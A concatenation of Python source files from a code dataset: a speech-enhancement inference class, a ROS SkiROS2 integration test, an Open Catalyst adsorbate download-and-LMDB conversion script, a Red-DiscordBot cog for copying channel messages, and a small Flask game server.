        # (i - N,..., i - 1, i)
        chunk_size = context_size + 1
        # [B, C, F, T] => [B * C * F, T] => [B * C * F, 1, 1, T]
        input = input.reshape(batch_size * num_channels * num_freqs, num_frames)
        input = input.unsqueeze(1).unsqueeze(1)
        # [B * C * F, chunk_size, num_chunks]
        output = functional.unfold(input, (1, chunk_size))
        # Split the dim of the unfolded feature
        # [B, num_chunks, C, F, chunk_size]
        output = output.reshape(batch_size, num_channels, num_freqs, chunk_size, -1)
        output = output.permute(0, 4, 1, 2, 3).contiguous()
        return output
    @staticmethod
    def _load_model(model_config, checkpoint_path, device):
        """Build the model from the config, restore the checkpoint weights,
        move it to ``device`` and switch it to eval mode.

        Returns:
            (model, epoch): the ready model and the checkpoint's epoch number.
        """
        model = initialize_module(model_config["path"], args=model_config["args"], initialize=True)
        model_checkpoint = torch.load(checkpoint_path, map_location="cpu")
        model_static_dict = model_checkpoint["model"]
        epoch = model_checkpoint["epoch"]
        print(f"Loading model checkpoint (epoch == {epoch})...")
        # Strip the "module." prefix that DataParallel/DistributedDataParallel
        # wrappers add to parameter names.
        model_static_dict = {key.replace("module.", ""): value for key, value in model_static_dict.items()}
        model.load_state_dict(model_static_dict)
        model.to(device)
        model.eval()
        return model, model_checkpoint["epoch"]
    @torch.no_grad()
    def multi_channel_mag_to_mag(self, noisy, inference_args=None):
        """
        The model's input is the **magnitude spectrogram** of the noisy
        speech and its output is likewise a **magnitude spectrogram**; the
        phase of the first (reference) channel is reused for reconstruction.
        """
        mixture_stft_coefficients = self.torch_stft(noisy)
        mixture_mag = (mixture_stft_coefficients.real ** 2 + mixture_stft_coefficients.imag ** 2) ** 0.5
        enhanced_mag = self.model(mixture_mag)
        # Phase of the reference channel
        reference_channel_stft_coefficients = mixture_stft_coefficients[:, 0, ...]
        noisy_phase = torch.atan2(reference_channel_stft_coefficients.imag, reference_channel_stft_coefficients.real)
        complex_tensor = torch.stack([(enhanced_mag * torch.cos(noisy_phase)), (enhanced_mag * torch.sin(noisy_phase))], dim=-1)
        enhanced = self.torch_istft(complex_tensor, length=noisy.shape[-1])
        enhanced = enhanced.detach().squeeze(0).cpu().numpy()
        return enhanced
    @torch.no_grad()
    def __call__(self):
        """Run inference over the dataloader, writing one enhanced wav (and a
        trimmed copy of the noisy input) per utterance."""
        inference_type = self.inference_config["type"]
        assert inference_type in dir(self), f"Not implemented Inferencer type: {inference_type}"
        inference_args = self.inference_config["args"]
        for noisy, name in tqdm(self.dataloader, desc="Inference"):
            assert len(name) == 1, "The batch size of inference stage must 1."
            name = name[0]
            enhanced = getattr(self, inference_type)(noisy.to(self.device), inference_args)
            # NOTE(review): ``.any()`` returns a bool, so ``abs(enhanced).any() > 1``
            # is always False; this was likely meant to be ``(abs(enhanced) > 1).any()``.
            if abs(enhanced).any() > 1:
                print(f"Warning: enhanced is not in the range [-1, 1], {name}")
            # Peak-normalize to 80% of int16 full scale before writing.
            amp = np.iinfo(np.int16).max
            enhanced = np.int16(0.8 * amp * enhanced / np.max(np.abs(enhanced)))
            sf.write(self.enhanced_dir / f"{name}.wav", enhanced, samplerate=self.acoustic_config["sr"])
            noisy = noisy.detach().squeeze(0).numpy()
            if np.ndim(noisy) > 1:
                noisy = noisy[0, :] # first channel
            noisy = noisy[:enhanced.shape[-1]]
            sf.write(self.noisy_dir / f"{name}.wav", noisy, samplerate=self.acoustic_config["sr"])
if __name__ == '__main__':
    # Quick shape check for the time-axis unfolding helper.
    spectrogram = torch.rand(10, 1, 257, 100)
    chunks = BaseInferencer._unfold_along_time(spectrogram, 30)
    print(chunks.shape)
eba865e72fedda4b6e07ef427f423c883f1ecadc | 2,995 | py | Python | scalable_individual_tests/test/test_skiros2.py | ScalABLE40/scalable_tests | ce6bcd3343d360d05310b9d8d09328bdded0ec1e | [
"Apache-2.0"
] | null | null | null | scalable_individual_tests/test/test_skiros2.py | ScalABLE40/scalable_tests | ce6bcd3343d360d05310b9d8d09328bdded0ec1e | [
"Apache-2.0"
] | null | null | null | scalable_individual_tests/test/test_skiros2.py | ScalABLE40/scalable_tests | ce6bcd3343d360d05310b9d8d09328bdded0ec1e | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import rospy
import sys
import unittest
import threading
from turtlesim.msg import Pose
from geometry_msgs.msg import Twist
from skiros2_skill.ros.skill_layer_interface import SkillLayerInterface
PKG = 'integration_tests'
NAME = 'test_integration_tm'
## A sample python unit test
if __name__ == '__main__':
import rostest
rostest.rosrun(PKG, NAME, 'test_skiros2.SuiteTest', sys.argv)
| 33.651685 | 101 | 0.674791 | #!/usr/bin/env python
import rospy
import sys
import unittest
import threading
from turtlesim.msg import Pose
from geometry_msgs.msg import Twist
from skiros2_skill.ros.skill_layer_interface import SkillLayerInterface
PKG = 'integration_tests'
NAME = 'test_integration_tm'
## A sample python unit test
class TestSkiros2(unittest.TestCase):
    """Integration test: drive a turtlesim robot through the SkiROS2 skill layer.

    Requires a running ROS graph with the turtlesim node, the ``/tts_robot``
    skill manager and the world-model (``/wm``) services available.
    """
    @classmethod
    def setUpClass(cls):
        # Bring up a test node and block until the simulated robot and the
        # SkiROS services are reachable (10 s timeouts each).
        rospy.init_node('testing_node')
        cls.sli = SkillLayerInterface()
        rospy.wait_for_message("turtle1/pose", Pose, 10.0)
        rospy.wait_for_service('/tts_robot/command', 10.0)
        rospy.wait_for_service('/wm/get', 10.0)
        rospy.sleep(5.0)
        # Signalled from _monitor_cb whenever a skill monitor message arrives.
        cls.event = threading.Event()
    def setUp(self):
        self.sli.set_monitor_cb(self._monitor_cb)
    def tearDown(self):
        # Detach the callback and reset shared event/message state so one
        # test cannot observe another test's notifications.
        self.sli.set_monitor_cb(None)
        self.event.clear()
        self.new_message = None
    def _check_turtle_pose_published(self, turtle="turtle1"):
        """Wait up to 1 s for a pose message; returns (True, message)."""
        message = rospy.wait_for_message("%s/pose" % (turtle), Pose, 1.0)
        return True, message
    def _check_turtle_cmd_vel_published(self, turtle="turtle1"):
        """Wait up to 1 s for a velocity command; returns (True, message)."""
        message = rospy.wait_for_message("%s/cmd_vel" % (turtle), Twist, 1.0)
        return True, message
    def _monitor_cb(self, message):
        # Skill-layer monitor callback: record the message and wake waiters.
        self.new_message = message
        self.event.set()
    def test_1(self):
        """The turtle publishes its spawn pose and the services are still up."""
        result, message = self._check_turtle_pose_published()
        self.assertTrue(result)
        self.assertAlmostEqual(message.x, 5.5, delta=0.1)
        self.assertAlmostEqual(message.y, 5.5, delta=0.1)
        self.assertAlmostEqual(message.theta, 0.0, delta=0.1)
        rospy.wait_for_service('/tts_robot/command', 1.0)
        rospy.wait_for_service('/wm/get', 1.0)
    def test_2(self):
        """Executing then preempting 'wander_around' moves and stops the turtle."""
        agent0 = self.sli.agents['/tts_robot']
        agent0skills = agent0.skills #Get all skills of the first skill manager
        execution_id = self.sli.execute(agent0.name, [agent0skills['wander_around']])#Execute a skill
        self._check_turtle_cmd_vel_published()
        if not(self.event.wait(1.0)):
            self.fail("No Monitored Callback")
        rospy.sleep(1.0)
        self.event.clear()
        self.new_message = None
        self.sli.preempt_one(tid=execution_id)
        if not(self.event.wait(1.0)):
            self.fail("No Monitored Callback after preemption")
        self.assertEqual(self.new_message.progress_message, "Preempted")
        # NOTE(review): x == 6.2 presumably reflects how far the wander skill
        # moves during the ~1 s run above — confirm if timing changes.
        result, message = self._check_turtle_pose_published()
        self.assertAlmostEqual(message.x, 6.2, delta=0.1)
        self.assertAlmostEqual(message.y, 5.5, delta=0.1)
class SuiteTest(unittest.TestSuite):
    """Suite that runs the TestSkiros2 cases in definition order."""
    def __init__(self):
        super(SuiteTest, self).__init__()
        # sortTestMethodsUsing=None keeps the test methods in definition
        # order instead of unittest's default alphabetical sorting.
        ordered_loader = unittest.TestLoader()
        ordered_loader.sortTestMethodsUsing = None
        self.addTests(ordered_loader.loadTestsFromTestCase(TestSkiros2))
if __name__ == '__main__':
    import rostest
    # Hand the suite to rostest, identified by its dotted path, with the
    # package/test names defined above.
    rostest.rosrun(PKG, NAME, 'test_skiros2.SuiteTest', sys.argv)
| 2,239 | 263 | 72 |
03fcf7a942c07ded7389e9ed4024b7d2bbb377e4 | 4,884 | py | Python | scripts/process_adsorbates.py | krylea/ocp | 00fc1df29731d70ff1b5cf8e9323d1d2f1f8e540 | [
"MIT"
] | null | null | null | scripts/process_adsorbates.py | krylea/ocp | 00fc1df29731d70ff1b5cf8e9323d1d2f1f8e540 | [
"MIT"
] | null | null | null | scripts/process_adsorbates.py | krylea/ocp | 00fc1df29731d70ff1b5cf8e9323d1d2f1f8e540 | [
"MIT"
] | null | null | null | from ocpmodels.preprocessing import AtomsToGraphs
from ocpmodels.datasets import SinglePointLmdbDataset, TrajectoryLmdbDataset
import ase.io
from ase.build import bulk
from ase.build import fcc100, add_adsorbate, molecule
from ase.constraints import FixAtoms
from ase.calculators.emt import EMT
from ase.optimize import BFGS
import matplotlib.pyplot as plt
import lmdb
import pickle
from tqdm import tqdm
import torch
import os
import glob
import re
import logging
import shutil
ADS_DL_LINK = "https://dl.fbaipublicfiles.com/opencatalystproject/data/per_adsorbate_is2res/"
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--root_dir', type=str, default="adsorbate-data")
args = parser.parse_args()
process_adsorbates(args.root_dir)
| 32.56 | 109 | 0.668919 | from ocpmodels.preprocessing import AtomsToGraphs
from ocpmodels.datasets import SinglePointLmdbDataset, TrajectoryLmdbDataset
import ase.io
from ase.build import bulk
from ase.build import fcc100, add_adsorbate, molecule
from ase.constraints import FixAtoms
from ase.calculators.emt import EMT
from ase.optimize import BFGS
import matplotlib.pyplot as plt
import lmdb
import pickle
from tqdm import tqdm
import torch
import os
import glob
import re
import logging
import shutil
ADS_DL_LINK = "https://dl.fbaipublicfiles.com/opencatalystproject/data/per_adsorbate_is2res/"
def uncompress_data(compressed_dir):
    """Uncompress an OCP trajectory directory.

    Runs the ``scripts.uncompress`` tool on ``compressed_dir`` and returns
    the path of the ``<compressed_dir>_uncompressed`` output directory.
    """
    import scripts.uncompress as uncompress
    output_dir = compressed_dir + "_uncompressed"
    # Reuse the tool's own argparse defaults, overriding only the in/out dirs.
    cli_args, _ = uncompress.get_parser().parse_known_args()
    cli_args.ipdir = compressed_dir
    cli_args.opdir = output_dir
    uncompress.main(cli_args)
    return output_dir
def download_ads(root_dir, ads_num):
    """Download and unpack one per-adsorbate IS2RES tarball.

    Fetches ``<ADS_DL_LINK><ads_num>.tar`` into ``root_dir`` with wget,
    extracts it in place, then deletes the archive.
    """
    download_link = ADS_DL_LINK + str(ads_num) + ".tar"
    os.system(f"wget {download_link} -P {root_dir}")
    filename = os.path.join(root_dir, os.path.basename(download_link))
    if os.path.exists(filename):
        logging.info("Extracting contents...")
        # BUGFIX: the tar command contained a literal "(unknown)" placeholder
        # instead of the downloaded archive path, so nothing was extracted.
        os.system(f"tar -xvf {filename} -C {root_dir}")
        os.remove(filename)
def read_trajectory_extract_features(a2g, traj_path):
    """Convert the first and last frames of an ASE trajectory to graph data.

    Returns a two-element list (initial, relaxed) of data objects, each
    annotated with the atom tags of the initial frame.
    """
    frames = ase.io.read(traj_path, ":")
    initial_tags = frames[0].get_tags()
    graphs = a2g.convert_all([frames[0], frames[-1]], disable_tqdm=True)
    graphs[0].tags = torch.LongTensor(initial_tags)
    graphs[1].tags = torch.LongTensor(initial_tags)
    return graphs
def write_ads_to_lmdb(root_dir, ads_num):
    """Convert one adsorbate's extxyz trajectories into a single LMDB file.

    Reads per-system reference energies from ``system.txt``, converts the
    initial/relaxed frames of every ``*.extxyz`` trajectory to graph data,
    and stores one pickled data object per system keyed by its system id.
    The finished database is then moved up to ``<root_dir>/<ads_num>.lmdb``.
    """
    # system.txt lines look like "...randomNNN...,<energy>": map id -> energy.
    with open(os.path.join(root_dir, str(ads_num), "system.txt")) as sysfile:
        system_data = sysfile.readlines()
    ref_energies = {}
    for line in system_data:
        id, energy = line.split(",")
        id = int(re.findall(r'random([\d]*)', id)[0])
        ref_energies[int(id)] = float(energy)
    # Build the LMDB next to the trajectories first, then move it up a level.
    lmdb_path1 = os.path.join(root_dir, str(ads_num), str(ads_num) + ".lmdb")
    lmdb_path2 = os.path.join(root_dir, str(ads_num) + ".lmdb")
    if os.path.exists(lmdb_path1):
        os.remove(lmdb_path1)
    db = lmdb.open(
        lmdb_path1,
        map_size=1099511627776 * 2,
        subdir=False,
        meminit=False,
        map_async=True,
    )
    a2g = AtomsToGraphs(
        max_neigh=50,
        radius=6,
        r_energy=True, # False for test data
        r_forces=True,
        r_distances=False,
        r_fixed=True,
    )
    traj_folder = os.path.join(root_dir, str(ads_num), str(ads_num)+"_uncompressed")
    ads_files = glob.glob(os.path.join(traj_folder, "*.extxyz"))
    for file in ads_files:
        # The system id is embedded in the file name as "random<NNN>".
        system_id = int(re.findall(r'random([\d]*)', file)[0])
        ref_energy = ref_energies[system_id]
        data_objects = read_trajectory_extract_features(a2g, file)
        initial_struc = data_objects[0]
        relaxed_struc = data_objects[1]
        initial_struc.y_init = initial_struc.y - ref_energy # subtract off reference energy, if applicable
        del initial_struc.y
        initial_struc.y_relaxed = relaxed_struc.y - ref_energy # subtract off reference energy, if applicable
        initial_struc.pos_relaxed = relaxed_struc.pos
        initial_struc.sid = system_id
        initial_struc.ads_num=ads_num
        # Skip structures whose graph has no edges at all.
        if initial_struc.edge_index.shape[1] == 0:
            print("no neighbors", system_id)
            continue
        txn = db.begin(write=True)
        txn.put(f"{system_id}".encode("ascii"), pickle.dumps(initial_struc, protocol=-1))
        txn.commit()
    db.sync()
    db.close()
    os.system(f"mv {lmdb_path1} {lmdb_path2}")
def process_adsorbates(root_dir, N_ADS=82):
    """Download, uncompress and convert every adsorbate dataset to LMDB.

    For each adsorbate index: fetch the raw archive (unless already present),
    uncompress it, write ``<root_dir>/<i>.lmdb`` and remove the intermediate
    working directory afterwards.
    """
    os.makedirs(root_dir, exist_ok=True)
    exists = os.path.exists
    for ads_num in range(N_ADS):
        print(ads_num)
        ads_dir = os.path.join(root_dir, str(ads_num))
        lmdb_path = os.path.join(root_dir, str(ads_num) + ".lmdb")
        # Only fetch when neither the working dir nor the final LMDB exists.
        if not (exists(ads_dir) or exists(lmdb_path)):
            download_ads(root_dir, ads_num)
        compressed_dir = os.path.join(ads_dir, str(ads_num))
        uncompressed_dir = os.path.join(ads_dir, str(ads_num) + "_uncompressed")
        if exists(compressed_dir) and not exists(uncompressed_dir):
            uncompress_data(compressed_dir)
            shutil.rmtree(compressed_dir)
        if not exists(lmdb_path) and exists(uncompressed_dir):
            write_ads_to_lmdb(root_dir, ads_num)
            logging.info("Finished adsorbate %d" % ads_num)
        else:
            logging.info("Skipping adsorbate %d" % ads_num)
        # Clean up the per-adsorbate working directory regardless of outcome.
        if exists(ads_dir):
            shutil.rmtree(ads_dir)
if __name__ == '__main__':
    import argparse

    # CLI entry point: only the dataset root directory is configurable.
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument('--root_dir', type=str, default="adsorbate-data")
    cli_args = arg_parser.parse_args()
    process_adsorbates(cli_args.root_dir)
| 3,944 | 0 | 115 |
e10c0d431f4e1a04c9d593c344afdd2132cd7d07 | 8,225 | py | Python | transferchannel/transferchannel.py | AAA3A-AAA3A/AAA3A-cogs | 076ff390610e2470a086bdae41647ee21f01c323 | [
"MIT"
] | 1 | 2022-03-17T02:06:37.000Z | 2022-03-17T02:06:37.000Z | transferchannel/transferchannel.py | AAA3A-AAA3A/AAA3A-cogs | 076ff390610e2470a086bdae41647ee21f01c323 | [
"MIT"
] | 2 | 2022-03-07T03:29:33.000Z | 2022-03-17T06:51:43.000Z | transferchannel/transferchannel.py | AAA3A-AAA3A/AAA3A-cogs | 076ff390610e2470a086bdae41647ee21f01c323 | [
"MIT"
] | 2 | 2021-11-24T19:31:55.000Z | 2022-01-02T06:34:22.000Z | from .AAA3A_utils.cogsutils import CogsUtils # isort:skip
from redbot.core import commands # isort:skip
from redbot.core.i18n import Translator, cog_i18n # isort:skip
from redbot.core.bot import Red # isort:skip
import discord # isort:skip
import typing # isort:skip
from .helpers import embed_from_msg
from redbot.core.utils.tunnel import Tunnel
if CogsUtils().is_dpy2: # To remove
setattr(commands, 'Literal', typing.Literal)
# Credits:
# Thanks to TrustyJAID's Backup for starting the command to list the latest source channel messages! (https://github.com/TrustyJAID/Trusty-cogs/tree/master/backup)
# Thanks to QuoteTools from SimBad for the embed!
# Thanks to Speak from @epic guy for the webhooks! (https://github.com/npc203/npc-cogs/tree/main/speak)
# Thanks to Say from LaggronsDumb for the attachments in the single messages and webhooks! (https://github.com/laggron42/Laggrons-Dumb-Cogs/tree/v3/say)
# Thanks to CruxCraft on GitHub for the idea of allowing channels from other servers! (https://github.com/AAA3A-AAA3A/AAA3A-cogs/issues/1)
# Thanks to @epic guy on Discord for the basic syntax (command groups, commands) and also commands (await ctx.send, await ctx.author.send, await ctx.message.delete())!
# Thanks to the developers of the cogs I added features to as it taught me how to make a cog! (Chessgame by WildStriker, Captcha by Kreusada, Speak by Epic guy and Rommer by Dav)
# Thanks to all the people who helped me with some commands in the #coding channel of the redbot support server!
_ = Translator("TransferChannel", __file__)
@cog_i18n(_)
class TextChannelGuildConverter(discord.ext.commands.TextChannelConverter):
"""Similar to d.py's TextChannelConverter but only returns if we have already
passed our hierarchy checks and find in all guilds.
"""
class TransferChannel(commands.Cog):
    """A cog to transfer all messages channel in a other channel!"""
    @commands.command(aliases=["channeltransfer"])
    @commands.admin_or_permissions(manage_guild=True)
    @commands.guild_only()
    async def transferchannel(self, ctx: commands.Context, source: TextChannelGuildConverter, destination: TextChannelGuildConverter, limit: int, way: commands.Literal["embed", "webhook", "message"]):
        """
        Transfer all messages channel in a other channel. This might take a long time.
        You can specify the id of a channel from another server.
        `source` is partial name or ID of the source channel
        `destination` is partial name or ID of the destination channel
        `way` is the used way
        - `embed` Do you want to transfer the message as an embed?
        - `webhook` Do you want to send the messages with webhooks (name and avatar of the original author)?
        - `message`Do you want to transfer the message as a simple message?
        """
        # Verify, per transfer mode, that the bot has the permissions it will
        # need in the destination channel before copying anything.
        permissions = destination.permissions_for(destination.guild.me)
        if way == "embed":
            if not permissions.embed_links:
                await ctx.send(_("I need to have all the following permissions for the {destination.name} channel ({destination.id}) in {destination.guild.name} ({destination.guild.id}).\n`embed_links`.").format(**locals()))
                return
        elif way == "webhook":
            if not permissions.manage_guild:
                await ctx.send(_("I need to have all the following permissions for the {destination.name} channel ({destination.id}) in {destination.guild.name} ({destination.guild.id}).\n`manage_channels`").format(**locals()))
                return
        count = 0
        # limit + 1: one extra message is fetched, presumably to compensate
        # for the invoking command message, which is skipped in the loop below.
        if self.cogsutils.is_dpy2:
            msgList = [message async for message in source.history(limit=limit + 1, oldest_first=False)]
        else:
            msgList = await source.history(limit=limit + 1, oldest_first=False).flatten()
        msgList.reverse()
        for message in msgList:
            if not message.id == ctx.message.id:
                count += 1
                files = await Tunnel.files_from_attatch(message)
                if way == "embed":
                    em = embed_from_msg(message, self.cogsutils)
                    await destination.send(embed=em)
                elif way == "webhook":
                    hook = await self.cogsutils.get_hook(destination)
                    await hook.send(
                        username=message.author.display_name,
                        avatar_url=message.author.display_avatar if self.cogsutils.is_dpy2 else message.author.avatar_url,
                        content=message.content,
                        files=files,
                    )
                elif way == "message":
                    iso_format = message.created_at.isoformat()
                    # NOTE(review): the Author line's display string has an
                    # unmatched "(" — output reads "author(id" with no ")".
                    # NOTE(review): the Time line's format key {isoformat}
                    # does not match the local name ``iso_format``, so
                    # .format(**locals()) will raise KeyError — confirm.
                    msg1 = "\n".join(
                        [
                            _("**Author:** {message.author}({message.author.id}").format(**locals()),
                            _("**Channel:** <#{message.channel.id}>").format(**locals()),
                            _("**Time(UTC):** {isoformat}").format(**locals())
                        ]
                    )
                    # Split when the combined text would exceed Discord's
                    # 2000-character message limit.
                    if len(msg1) + len(message.content) < 2000:
                        await ctx.send(msg1 + "\n\n" + message.content, files=files)
                    else:
                        await ctx.send(msg1)
                        await ctx.send(message.content, files=files)
await ctx.send(_("{count} messages transfered from {source.mention} to {destination.mention}").format(**locals())) | 62.78626 | 299 | 0.643161 | from .AAA3A_utils.cogsutils import CogsUtils # isort:skip
from redbot.core import commands # isort:skip
from redbot.core.i18n import Translator, cog_i18n # isort:skip
from redbot.core.bot import Red # isort:skip
import discord # isort:skip
import typing # isort:skip
from .helpers import embed_from_msg
from redbot.core.utils.tunnel import Tunnel
if CogsUtils().is_dpy2: # To remove
setattr(commands, 'Literal', typing.Literal)
# Credits:
# Thanks to TrustyJAID's Backup for starting the command to list the latest source channel messages! (https://github.com/TrustyJAID/Trusty-cogs/tree/master/backup)
# Thanks to QuoteTools from SimBad for the embed!
# Thanks to Speak from @epic guy for the webhooks! (https://github.com/npc203/npc-cogs/tree/main/speak)
# Thanks to Say from LaggronsDumb for the attachments in the single messages and webhooks! (https://github.com/laggron42/Laggrons-Dumb-Cogs/tree/v3/say)
# Thanks to CruxCraft on GitHub for the idea of allowing channels from other servers! (https://github.com/AAA3A-AAA3A/AAA3A-cogs/issues/1)
# Thanks to @epic guy on Discord for the basic syntax (command groups, commands) and also commands (await ctx.send, await ctx.author.send, await ctx.message.delete())!
# Thanks to the developers of the cogs I added features to as it taught me how to make a cog! (Chessgame by WildStriker, Captcha by Kreusada, Speak by Epic guy and Rommer by Dav)
# Thanks to all the people who helped me with some commands in the #coding channel of the redbot support server!
_ = Translator("TransferChannel", __file__)
@cog_i18n(_)
class TextChannelGuildConverter(discord.ext.commands.TextChannelConverter):
    """Similar to d.py's TextChannelConverter but only returns if we have already
    passed our hierarchy checks and find in all guilds.
    """
    async def convert(self, ctx: commands.Context, argument: str) -> discord.TextChannel:
        """Resolve ``argument`` to a text channel.

        First tries the regular converter; for channels in the current guild
        the invoker must be able to manage the server and the bot must have
        read/history/send/view permissions. Bot owners may additionally give
        the raw ID of a text channel in any other server the bot is in.
        Every failure path raises ``BadArgument`` with a user-facing message.
        """
        try:
            channel: discord.TextChannel = await discord.ext.commands.TextChannelConverter().convert(ctx, argument)
        except Exception:
            channel = None
        if channel is not None:
            if channel.guild == ctx.guild:
                # Non-owners must hold manage-guild rights on this server.
                if ctx.author.id not in ctx.bot.owner_ids and not channel.permissions_for(ctx.author).manage_guild:
                    raise discord.ext.commands.BadArgument(_("You must have permissions to manage this server to use this command.").format(**locals()))
                permissions = channel.permissions_for(channel.guild.me)
                if not permissions.read_messages or not permissions.read_message_history or not permissions.send_messages or not permissions.view_channel:
                    raise discord.ext.commands.BadArgument(_("I need to have all the following permissions for the {channel.mention} channel ({channel.id}).\n`read_messages`, `read_message_history`, `send_messages` and `view_channel`.").format(**locals()))
                return channel
            if ctx.author.id not in ctx.bot.owner_ids:
                raise discord.ext.commands.BadArgument(_("This channel cannot be found.").format(**locals()))
        # Owner-only path: accept a raw channel ID from any server.
        try:
            argument = int(argument)
        except ValueError:
            # BUGFIX: ``int()`` raises ValueError (not NameError) on
            # non-numeric input; the old ``except NameError`` let the
            # ValueError escape the converter instead of falling through
            # to the friendly "cannot be found" error below.
            pass
        channel: discord.TextChannel = ctx.bot.get_channel(argument)
        if channel is None:
            raise discord.ext.commands.BadArgument(_("This channel cannot be found. If this channel is in another Discord server, please give the id of a valid text channel.").format(**locals()))
        if not isinstance(channel, discord.TextChannel):
            raise discord.ext.commands.BadArgument(_("The specified channel must be a text channel in a server where the bot is located.").format(**locals()))
        permissions = channel.permissions_for(channel.guild.me)
        if not permissions.read_messages or not permissions.read_message_history or not permissions.send_messages or not permissions.view_channel:
            # BUGFIX: this message formatted "{destination.guild.name}" but no
            # ``destination`` local exists in this method, so .format(**locals())
            # raised KeyError instead of showing the error; use ``channel``.
            raise discord.ext.commands.BadArgument(_("I need to have all the following permissions for the {channel.name} channel ({channel.id}) in {channel.guild.name} ({channel.guild.id}).\n`read_messages`, `read_message_history`, `send_messages` and `view_channel`.").format(**locals()))
        return channel
class TransferChannel(commands.Cog):
    """A cog to transfer all messages channel in a other channel!"""

    def __init__(self, bot):
        self.bot: Red = bot
        self.cache = {}
        self.cogsutils = CogsUtils(cog=self)
        self.cogsutils._setup()

    @commands.command(aliases=["channeltransfer"])
    @commands.admin_or_permissions(manage_guild=True)
    @commands.guild_only()
    async def transferchannel(self, ctx: commands.Context, source: TextChannelGuildConverter, destination: TextChannelGuildConverter, limit: int, way: commands.Literal["embed", "webhook", "message"]):
        """
        Transfer all messages channel in a other channel. This might take a long time.
        You can specify the id of a channel from another server.
        `source` is partial name or ID of the source channel
        `destination` is partial name or ID of the destination channel
        `way` is the used way
        - `embed` Do you want to transfer the message as an embed?
        - `webhook` Do you want to send the messages with webhooks (name and avatar of the original author)?
        - `message` Do you want to transfer the message as a simple message?
        """
        permissions = destination.permissions_for(destination.guild.me)
        if way == "embed":
            if not permissions.embed_links:
                await ctx.send(_("I need to have all the following permissions for the {destination.name} channel ({destination.id}) in {destination.guild.name} ({destination.guild.id}).\n`embed_links`.").format(**locals()))
                return
        elif way == "webhook":
            # BUG FIX: creating/fetching a webhook requires `manage_webhooks`;
            # the previous code checked `manage_guild` while telling the user
            # about `manage_channels`.
            if not permissions.manage_webhooks:
                await ctx.send(_("I need to have all the following permissions for the {destination.name} channel ({destination.id}) in {destination.guild.name} ({destination.guild.id}).\n`manage_webhooks`").format(**locals()))
                return
        count = 0
        # Fetch limit+1 messages so that skipping the invoking command message
        # below does not eat into the requested budget.
        if self.cogsutils.is_dpy2:
            msgList = [message async for message in source.history(limit=limit + 1, oldest_first=False)]
        else:
            msgList = await source.history(limit=limit + 1, oldest_first=False).flatten()
        msgList.reverse()  # repost in chronological order
        for message in msgList:
            if message.id == ctx.message.id:
                continue  # never re-send the command invocation itself
            count += 1
            files = await Tunnel.files_from_attatch(message)
            if way == "embed":
                em = embed_from_msg(message, self.cogsutils)
                await destination.send(embed=em)
            elif way == "webhook":
                hook = await self.cogsutils.get_hook(destination)
                await hook.send(
                    username=message.author.display_name,
                    avatar_url=message.author.display_avatar if self.cogsutils.is_dpy2 else message.author.avatar_url,
                    content=message.content,
                    files=files,
                )
            elif way == "message":
                # BUG FIX: the variable was named `iso_format` while the
                # translated string references `{isoformat}`, so
                # .format(**locals()) raised KeyError on every message.
                isoformat = message.created_at.isoformat()
                msg1 = "\n".join(
                    [
                        _("**Author:** {message.author}({message.author.id})").format(**locals()),
                        _("**Channel:** <#{message.channel.id}>").format(**locals()),
                        _("**Time(UTC):** {isoformat}").format(**locals())
                    ]
                )
                # Discord rejects messages over 2000 characters: split the
                # header and the content when needed.
                # BUG FIX: the "message" way previously sent the copies to
                # `ctx` (the invoking channel) instead of `destination`.
                if len(msg1) + len(message.content) < 2000:
                    await destination.send(msg1 + "\n\n" + message.content, files=files)
                else:
                    await destination.send(msg1)
                    await destination.send(message.content, files=files)
        await ctx.send(_("{count} messages transfered from {source.mention} to {destination.mention}").format(**locals()))
3ae75d8b75ea2eb0be1ad6128bc5b65fc54e72ec | 1,159 | py | Python | server.py | Benjadahl/BenjaWorld | c07cd5bc0960db81d0462e87793ec1af7885c3fb | [
"Apache-2.0"
] | null | null | null | server.py | Benjadahl/BenjaWorld | c07cd5bc0960db81d0462e87793ec1af7885c3fb | [
"Apache-2.0"
] | null | null | null | server.py | Benjadahl/BenjaWorld | c07cd5bc0960db81d0462e87793ec1af7885c3fb | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
#Import packages
from flask import *
#Import local packages
import dbHandler as db
#Start flask app
app = Flask(__name__)
#Default index page
@app.route('/')
#The town page, the game will automatically direct the page to your town when accesing this URL
@app.route('/login/')
#The town page, the game will automatically direct the page to your town when accesing this URL
@app.route('/town/')
@app.route('/group/')
@app.route('/g/<username>')
#Post requests
@app.route('/login/', methods=['POST'])
if __name__ == "__main__":
#Initailize the database
db.init("./database/")
#db.end()
app.run(debug=True, host="0.0.0.0")
| 23.18 | 95 | 0.69025 | #!/usr/bin/env python3
#Import packages
from flask import *
#Import local packages
import dbHandler as db
#Start flask app
app = Flask(__name__)
#Default index page
@app.route('/')
def showStart():
return render_template("index.html")
#The town page, the game will automatically direct the page to your town when accesing this URL
@app.route('/login/')
def showLogin():
resp = make_response(render_template("login.html"))
resp.cache_control.no_cache = True
return resp
#The town page, the game will automatically direct the page to your town when accesing this URL
@app.route('/town/')
def showTown():
return render_template("town.html")
@app.route('/group/')
def showGroup():
return render_template("group.html")
@app.route('/g/<username>')
def showUser(username):
return "This is the group of: " + username
#Post requests
@app.route('/login/', methods=['POST'])
def login():
print("lel")
db.newGroup(str(request.json["userID"]))
print(request.json)
return "Login: "
if __name__ == "__main__":
#Initailize the database
db.init("./database/")
#db.end()
app.run(debug=True, host="0.0.0.0")
| 359 | 0 | 132 |
21d106280f96337744d3d15fd3da390137d948df | 1,046 | py | Python | INF101/TP/TP6/2.6.1.4_mirror.py | Marshellson/UGA_IMF | eb293deabcc5ef6e45617d8c5bb6268b63b34f21 | [
"MIT"
] | 1 | 2021-09-21T21:53:17.000Z | 2021-09-21T21:53:17.000Z | INF101/TP/TP6/2.6.1.4_mirror.py | Marshellson/UGA_INF | eb293deabcc5ef6e45617d8c5bb6268b63b34f21 | [
"MIT"
] | null | null | null | INF101/TP/TP6/2.6.1.4_mirror.py | Marshellson/UGA_INF | eb293deabcc5ef6e45617d8c5bb6268b63b34f21 | [
"MIT"
] | null | null | null | '''
Author: JIANG Yilun
Date: 2022-02-21 15:13:14
LastEditTime: 2022-02-21 15:16:30
LastEditors: JIANG Yilun
Description:
FilePath: /UGA_INF/INF101/TP/TP6/2.6.1.4_mirror.py
'''
import sys
import math
# Auto-generated code below aims at helping you parse
# the standard input according to the problem statement.
